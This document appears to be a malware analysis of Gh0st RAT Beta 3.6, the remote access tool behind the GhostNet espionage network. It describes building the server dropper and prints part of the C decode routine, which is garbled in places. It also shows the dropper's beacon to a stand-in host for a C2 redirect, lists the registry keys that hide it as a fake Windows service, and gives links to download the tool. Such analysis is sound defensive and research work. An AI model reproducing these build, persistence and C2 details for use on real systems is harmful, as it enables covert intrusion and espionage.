"This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.
The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured.
The report concludes that who is in control of GhostNet is less important than the opportunity for generating strategic intelligence that it represents. The report underscores the growing capabilities of computer network exploitation, the ease by which cyberspace can be used as a vector for new do-it-yourself form of signals intelligence. It ends with warning to policy makers that information security requires serious attention."
Gh0st RAT
GhostNet is a dubbed name for the C2 network of hosts infected with Gh0st RAT. The latest version of Gh0st RAT is Gh0st RAT Beta 3.6.
Gh0st RAT Beta 3.6 (English) Usage
Server Creation
The file gh0st_eng.exe is used to create the Gh0st RAT server dropper and serves as the C2 management console.
File: gh0st_eng.exe
Size: 712704
MD5: 88912D9FE630BEE510BD7E85D0F9331D
The setting tab provides the C2 listening port, proxy configurations, user and password, IP and port for the Gh0st RAT to connect to, and a string created by an algorithm based on the DNS/IP and port.
The Gh0st RAT Beta 3.6 source decode.h file contains the algorithm for the Key Strings creation.
static char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static int pos(char c)
{
char *p;
for(p = base64; *p; p++)
if(*p == c)
return p - base64;
return -1;
}
int base64_decode(const char *str, char **data)
{
const char *s, *p;
unsigned char *q;
int c;
int x;
int done = 0;
int len;
s = (const char *)malloc(strlen(str));
q = (unsigned char *)s;
for(p=str; *p && !done; p+=4){
x = pos(p[0]);
if(x >= 0)
c = x;
else{
done = 3;
break;
}
c*=64;
x = pos(p[1]);
if(x >= 0)
c += x;
else
return -1;
c*=64;
if(p[2] == '=')
done++;
else{
x = pos(p[2]);
if(x >= 0)
c += x;
else
return -1;
}
c*=64;
if(p[3] == '=')
done++;
else{
if(done)
return -1;
x = pos(p[3]);
if(x >= 0)
c += x;
else
return -1;
}
if(done <>>16;
if(done <>>8;
if(done <>>0;
}
len = q - (unsigned char*)(s);
*data = (char*)realloc((void *)s, len);
return len;
}
char* MyDecode(char *str)
{
int i, len;
char *data = NULL;
len = base64_decode(str, &data);
for (i = 0; i <>
The build tab provides a C2 HTTP initial destination, and registry key parameters. The tool gives credit to C.Rufus Security Team and CoolDiyer. The source code ReadMe file included the following credits and links to the tool and demo.
Gh0st RAT
C.Rufus Security Team
http://www.wolfexp.net
http://www.wolfexp.net/other/Gh0st_RAT/index.html
http://www.wolfexp.net/other/Gh0st_RAT/demo.rar
In this example, the Gh0st RAT server was created as:
File: server.exe
Size: 112247
MD5: 7602AA86A58D68CCFD2E380BD6DA5158
Server Execution
The server component is intended to be executed on a victim system. The execution of server.exe results in the download of ip.jpg which contains the string that causes the redirect to the real C2 site.
GET /ip.jpg HTTP/1.0
User-Agent: Mozilla/4.0 (compatible)
Host: www.badsite.org
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 11 Apr 2009 18:13:58 GMT
Server: Apache
Last-Modified: Sat, 11 Apr 2009 18:06:35 GMT
ETag: "1bdecfd-20-49e0dc2b"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: image/jpeg
AAAArqaxva61p72vva6xqaevnw==AAAA
Server.exe creates the dll file 6to4svc.dll in the system32 directory.
File: 6to4svc.dll
Size: 100352
MD5: 97D0CECEF133BBE59ABF3CB6D05226C3
The following registry keys register 6to4svc.dll as the service 6to4 with the display name Microsoft Device Manager.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Description"
Type: REG_SZ
Data: Service Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "DisplayName"
Type: REG_SZ
Data: Microsoft Device Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ImagePath"
Type: REG_EXPAND_SZ
Data: %SystemRoot%\System32\svchost.exe -k netsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Type"
Type: REG_DWORD
Data: 20, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_6TO4\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Parameters "ServiceDll"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\system32\6to4ex.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Security "Security"
Type: REG_BINARY
Data:[hex]
The Gh0st RAT server 6to4svc.dll connects to the C2 host destination.
Server Gh0st RAT Management
The Gh0st RAT C2 management console provides several options for manipulating a victim host. The C2 functionality can be observed at http://www.youtube.com/watch?v=qP-9qmSCe7o
